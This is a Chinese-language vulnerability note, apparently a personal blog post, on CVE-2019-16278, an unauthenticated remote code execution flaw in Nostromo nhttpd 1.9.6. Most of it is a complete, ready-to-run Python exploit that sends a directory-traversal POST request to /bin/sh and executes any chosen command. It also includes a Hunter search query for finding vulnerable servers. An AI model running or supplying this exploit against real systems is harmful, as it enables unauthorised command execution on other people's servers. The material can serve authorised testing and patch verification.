漏洞描述
用于利用 Nostromo nhttpd 中函数 http_verify 中的目录遍历漏洞利用 CVE-2019-16278 (Nostromo 1.9.6),该漏洞通过精心设计的 HTTP 请求导致未经身份验证的 RCE。仅将 Web 服务器的主机和端口作为必需参数。
漏洞影响
s ✅
Nostromo 1.9.6
空间测绘
d ⭕
hunter:web.similar_id="4fe4d6adce727c111450c2be583537b6"&&header.server=="nostromo 1.9.6"
漏洞复现
- 确认版本存在漏洞
- ✅漏洞验证,成功返回id命令
# CVE-2019-16278
# a quick python exploit for the Nostromo 1.9.6 remote code execution vulnerability.
# simply takes a host and port that the web server is running on, as well as an optional command.
# just provide an IP/port and the command you want to run and you're good to go.
# (if command has spaces, put command between "")
import socket
import argparse
import sys
# i would use sys.argv since this is simple but this way is cleaner
parser = argparse.ArgumentParser(description='Nostromo Remote Code Execution (CVE-2019-16278)')
parser.add_argument('host',help='domain/IP of the Nostromo web server')
parser.add_argument('port',help='port number',type=int)
parser.add_argument('cmd',help='command to execute, default is id',default='id',nargs='?')
args = parser.parse_args()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # set up our socket stream
# such a simple payload, you should pay more attention your dirs
payload = "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n"
payload += "Content-Length: 1\r\n\r\necho\necho\n"
payload += "%s 2>&1" % args.cmd
print("[+] Crafted malicious HTTP request payload.")
print ("[+] Connecting to target..")
try:
s.connect((args.host , int(args.port)))
except ConnectionRefusedError:
print("[!] Cannot connect, target actively refused connection.")
sys.exit(1)
print("[+] Sending malicious payload..\n")
s.sendall(payload.encode('utf-8') )
data = []
while True:
chunk = s.recv(1024) #blocks while waiting for data
if chunk: data.append(chunk.decode("utf-8"))
# ff the recv() returns a blank string, then the other side
# closed the socket, and no more data will be sent:
else: break
print("".join(data))
个人博客
孤桜懶契:https://gylq.gitee.io/time